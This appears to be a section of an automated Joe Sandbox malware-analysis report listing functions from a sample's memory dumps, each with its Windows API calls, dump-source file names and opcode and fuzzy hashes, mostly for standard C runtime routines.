Part of subcall function 038F3536: RtlFreeHeap.NTDLL(00000000), ref: 038F3544

Strings

%s\%s, xrefs: 038F416D
%s\*, xrefs: 038F40F7

Memory Dump Source

Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: FileFindHeap$FirstFreeNextProcess
String ID: %s\%s$%s\*
API String ID: 1689202581-2848263008
Opcode ID: 6c7f4a23d1e343e8b7ce24adef7ab114a0bea6cb38d0b76245f1303778319e5d
Instruction ID: a82bc65aefb81ffa9434633407210ad0dfbf5dd264bd9e0c482798dbc036d364
Opcode Fuzzy Hash: 6c7f4a23d1e343e8b7ce24adef7ab114a0bea6cb38d0b76245f1303778319e5d
Instruction Fuzzy Hash: EC3196787003189FDB20FEEACC8466F7BA99F94240F1440E9DB05CB345EB748A45CB91

Function 007D0495 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 007D04A1
IsDebuggerPresent.KERNEL32 ref: 007D056D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 007D0586
UnhandledExceptionFilter.KERNEL32(?), ref: 007D0590

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 0a8d4c52c89d7b4953a564c1b67fbfd43da1c357d7e64e3b78fe39ec5b2e29ea
Instruction ID: d5488ec3791ef2cbc490dea4c9c82447336888e656aa512b1be1334d0133ddf9
Opcode Fuzzy Hash: 0a8d4c52c89d7b4953a564c1b67fbfd43da1c357d7e64e3b78fe39ec5b2e29ea
Instruction Fuzzy Hash: 1131FB75D01219DBDF20EF64D989BCDBBB8AF08304F10419AE50DAB350E7749A84CF85

Function 007E50DC Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 007DA8F0: GetLastError.KERNEL32(?,?,007D71B7,?,?,?,?,00000003,007D4382,?,007D42F1,?,00000000,007D4500), ref: 007DA8F4
Part of subcall function 007DA8F0: SetLastError.KERNEL32(00000000,00000000,007D4500,?,?,?,?,?,00000000,?,?,007D459E,00000000,00000000,00000000,00000000), ref: 007DA996

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007E5130
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007E517A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007E5240

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 51bce62c7428dbdddbc06d68bcf3e8c77dcd6b02617e449978fc75a7186c96f1
Instruction ID: 832c92fd16e2593c17b73989fa95392a1f0c0e38d936c48584c2d19d7a8650a3
Opcode Fuzzy Hash: 51bce62c7428dbdddbc06d68bcf3e8c77dcd6b02617e449978fc75a7186c96f1
Instruction Fuzzy Hash: B661B3B191264BDFDB289F26CD86B6A77A9FF08308F104079EA05C6185F77CD951CB50

Function 007D4383 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 007D447B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 007D4485
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 007D4492

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 5b0f78c2e13555c04cd80bf53e86e55c20b64dac844379f8bf2a80cbd86d1164
Instruction ID: b3f36d968593a2c0d6dc8c184e4d3a66911ea1dd963cad3f9acb9ab0fa86270e
Opcode Fuzzy Hash: 5b0f78c2e13555c04cd80bf53e86e55c20b64dac844379f8bf2a80cbd86d1164
Instruction Fuzzy Hash: 0831C475901218EBCB21DF64D98979DBBB8BF08310F5041DAE50CA6250E7749B858F44

Function 007DD515 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,007DD510,?,?,00000008,?,?,007E7A3B,00000000), ref: 007DD742

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 39ae5f170c611ac7e16690354fbd74b063b05dc7afffe292bab36b645283d42c
Instruction ID: 9915dc1f0c2212f3a7651b2dbbf52412857bf7037bb6fddf82c761da90f46195
Opcode Fuzzy Hash: 39ae5f170c611ac7e16690354fbd74b063b05dc7afffe292bab36b645283d42c
Instruction Fuzzy Hash: 4EB118356106099FD725CF28C48AB657BB0FF45364F298699E89ACF3A1C339ED91CB40

Function 007D013C Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 007D0152

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: c7e3cb259701ffe09103ea18a69566f9cae0562247c87141192fd5186e86b3be
Instruction ID: c0d83ef13305ddf6a4b298e99dee2ec255c573e5bb0a8871fe5fd2c7a0e8a4c3
Opcode Fuzzy Hash: c7e3cb259701ffe09103ea18a69566f9cae0562247c87141192fd5186e86b3be
Instruction Fuzzy Hash: 26515AB19012099FDB15CFA8E9857AEBBF4FB48310F24D42AD509EB351E37CA940CB94

Function 007E24BD Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38908f4e869f203113194be2c37d6bc2f80a35ab35986c09ce5430c1b95e19f8
Instruction ID: 38c0ca271dd49a9fcab6e7e2884bbf5d1bee2f59858f382f76e4fddec529c342
Opcode Fuzzy Hash: 38908f4e869f203113194be2c37d6bc2f80a35ab35986c09ce5430c1b95e19f8
Instruction Fuzzy Hash: 5441B4B5805258AFDF20DF69CC89AAAB7BDAF49300F1442D9E40DD3201DA389E858F10

Function 007E532F Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 007DA8F0: GetLastError.KERNEL32(?,?,007D71B7,?,?,?,?,00000003,007D4382,?,007D42F1,?,00000000,007D4500), ref: 007DA8F4
Part of subcall function 007DA8F0: SetLastError.KERNEL32(00000000,00000000,007D4500,?,?,?,?,?,00000000,?,?,007D459E,00000000,00000000,00000000,00000000), ref: 007DA996

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007E5383

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 816c4179c7e26f2425694283653593a5520664bc0988523b42d80ec60f0dc1df
Instruction ID: 1a4e390ac79d580dcbb8bcfe241261de0aadf4501f31ed96024436be3b5e2305
Opcode Fuzzy Hash: 816c4179c7e26f2425694283653593a5520664bc0988523b42d80ec60f0dc1df
Instruction Fuzzy Hash: A921C57261268AABDB289F16DC46ABA73B8EF48359F10407AFD01C6141EB7CED41C750

Function 007E4FB6 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 007DA8F0: GetLastError.KERNEL32(?,?,007D71B7,?,?,?,?,00000003,007D4382,?,007D42F1,?,00000000,007D4500), ref: 007DA8F4
Part of subcall function 007DA8F0: SetLastError.KERNEL32(00000000,00000000,007D4500,?,?,?,?,?,00000000,?,?,007D459E,00000000,00000000,00000000,00000000), ref: 007DA996

EnumSystemLocalesW.KERNEL32(007E50DC,00000001,00000000,?,-00000050,?,007E5710,00000000,?,?,?,00000055,?), ref: 007E5028

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: ff973e0397c9b297af92845428be61c57f363087b8dd63f5aec76e88b85b23ca
Instruction ID: 013ff46a93acd6e2087998b605ec3da10ad53afc2a61723e3b04ec33e7a1578b
Opcode Fuzzy Hash: ff973e0397c9b297af92845428be61c57f363087b8dd63f5aec76e88b85b23ca
Instruction Fuzzy Hash: 0A114C372017059FDB289F39C89167AB791FF88358B18442DEA4687740D379B943C740

Function 007E555E Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 007DA8F0: GetLastError.KERNEL32(?,?,007D71B7,?,?,?,?,00000003,007D4382,?,007D42F1,?,00000000,007D4500), ref: 007DA8F4
Part of subcall function 007DA8F0: SetLastError.KERNEL32(00000000,00000000,007D4500,?,?,?,?,?,00000000,?,?,007D459E,00000000,00000000,00000000,00000000), ref: 007DA996

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,007E52F8,00000000,00000000,?), ref: 007E558A

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: d269126c945ec202975ca482052d213504fcf0c55f86abb84c9c80ec327088d4
Instruction ID: e009c6f6573a933ce68ceb19e02e98b3223876b4f57f0bde221710eaecb0c126
Opcode Fuzzy Hash: d269126c945ec202975ca482052d213504fcf0c55f86abb84c9c80ec327088d4
Instruction Fuzzy Hash: BE01FE32601657BFDB285725CC457BB3766EF44758F154429ED06E3180EA38FE51C6A0

Function 007E5051 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 007DA8F0: GetLastError.KERNEL32(?,?,007D71B7,?,?,?,?,00000003,007D4382,?,007D42F1,?,00000000,007D4500), ref: 007DA8F4
Part of subcall function 007DA8F0: SetLastError.KERNEL32(00000000,00000000,007D4500,?,?,?,?,?,00000000,?,?,007D459E,00000000,00000000,00000000,00000000), ref: 007DA996

EnumSystemLocalesW.KERNEL32(007E532F,00000001,00000000,?,-00000050,?,007E56D8,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 007E509B

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 7c7bb13d87782aa3e8dbb9a0b63bf087f886da4356379eac223e91b9135a5330
Instruction ID: b2c45b159217c31de7a9fbf29c56e3cba101b012099639fddee6e7d812fd41c8
Opcode Fuzzy Hash: 7c7bb13d87782aa3e8dbb9a0b63bf087f886da4356379eac223e91b9135a5330
Instruction Fuzzy Hash: BCF04C36301B485FCB245F3A98C167A7BA1EF8835CB04402DF9054B640C6B59C42C750

Function 007DDBC7 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 007D49CA: EnterCriticalSection.KERNEL32(-007FB8A8,?,007D76D7,00000000,007F8C40,0000000C,007D769F,?,?,007DDB90,?,?,007DAA8E,00000001,00000364,00000000), ref: 007D49D9

EnumSystemLocalesW.KERNEL32(007DDBBA,00000001,007F8E30,0000000C,007DDF92,00000000), ref: 007DDBFF

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 62ff344920953ccdca659750f5c21115e04449ea6a030882b57b553ba9b5dd76
Instruction ID: 6c960e8ad207d854cfd120a39b705436e7ad1827a507df62dbdcaf844791de13
Opcode Fuzzy Hash: 62ff344920953ccdca659750f5c21115e04449ea6a030882b57b553ba9b5dd76
Instruction Fuzzy Hash: 9DF03772A10204DFDB10DF98E846BAD7BB1EB08720F00812BE5049B3A0DBBD9900CB55

Function 007E4F6B Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 007DA8F0: GetLastError.KERNEL32(?,?,007D71B7,?,?,?,?,00000003,007D4382,?,007D42F1,?,00000000,007D4500), ref: 007DA8F4
Part of subcall function 007DA8F0: SetLastError.KERNEL32(00000000,00000000,007D4500,?,?,?,?,?,00000000,?,?,007D459E,00000000,00000000,00000000,00000000), ref: 007DA996

EnumSystemLocalesW.KERNEL32(007E4EC4,00000001,00000000,?,?,007E5732,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 007E4FA2

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 2a684be343d6d5ce8d0a597d689d2a7b6ac00ecf4265e1b102ed9c3ed1c8a03f
Instruction ID: 52f08125eacc07c6f51e9e879614e13bb7ca8443f2c2cc0680c8c76cbf08483e
Opcode Fuzzy Hash: 2a684be343d6d5ce8d0a597d689d2a7b6ac00ecf4265e1b102ed9c3ed1c8a03f
Instruction Fuzzy Hash: 0CF0E5367002C69BCF149F3AD84966ABFA4FFC5B10B0A4059EE058F691C6799882C790

Function 007DE096 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,007D9527,?,20001004,00000000,00000002,?,?,007D8B19), ref: 007DE0CA

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: e2427454e5a4208b2dafe54fe4e1f267a3c514e3f1024819542890f33bce5250
Instruction ID: 3fb08e348576364ff2f1e0cd3dd1a50d8f91faaf1ed72df641bfa7dfd3998e87
Opcode Fuzzy Hash: e2427454e5a4208b2dafe54fe4e1f267a3c514e3f1024819542890f33bce5250
Instruction Fuzzy Hash: ACE01232501118BBCB123F51DC08B9D3E2ABB48750F148415FD055A26187799D20EA95

Function 007D0622 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0006062E,007CFC56), ref: 007D0627

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: d76f1eb26a1382901ea5a8f55c5c0ffac737492961a60d50fa4f947ffe58908b
Instruction ID: 00d331f43958ed95cb4b287b3a6294676238685a42a2550b7e14030a50437633
Opcode Fuzzy Hash: d76f1eb26a1382901ea5a8f55c5c0ffac737492961a60d50fa4f947ffe58908b
Instruction Fuzzy Hash:

Function 007E5891 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 007E5891

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 5114a365ae6b734d2a4d75b3d0b459fb92af825966c305f205e43bc496b8305f
Instruction ID: 42759a91c8dbb14326e9cb74d96587778c847448251b6441782c1ef93928e3ea
Opcode Fuzzy Hash: 5114a365ae6b734d2a4d75b3d0b459fb92af825966c305f205e43bc496b8305f
Instruction Fuzzy Hash: 97A001B162224ACB97408F35AF492193BE9AA49A91B16C1A9A505CA160EB388450DA09

Function 007DBE09 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a000a9e535a8289a552d6f007a0ff04bd4daf3c708cc99060d94078053bbd9f
Instruction ID: b64aa603c219eead9b586cfac14e2bca40c7dfe5c324d8874846af660566ac34
Opcode Fuzzy Hash: 0a000a9e535a8289a552d6f007a0ff04bd4daf3c708cc99060d94078053bbd9f
Instruction Fuzzy Hash: DB325821D69F424DD7239634D8723356258AFB73C4F25D737F82AB5AAAEB2CD4938100

Function 007E4775 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 4252944fdd24e0ab06015ca56b62e193372d2ca5e9843bddefdfd40febaf14c9
Instruction ID: ad8a01f4622bf310b90d6a9db21089b8d75e2cf411458585befd38e235002620
Opcode Fuzzy Hash: 4252944fdd24e0ab06015ca56b62e193372d2ca5e9843bddefdfd40febaf14c9
Instruction Fuzzy Hash: 3BB127755017819BDB389F26CC86BB7B3E8EF48308F14852DE943C6680EA79B981CB10

Function 007D1490 Relevance: .1, Instructions: 76COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: e14daaea0d053023d4adf44f60af3058f96af05a211ad7c565b1ce11678af3c8
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 22115B772000C263DA14CA7DE8B45B6A3B5EBC5320BACC3BBD0438B744D52ED851D600

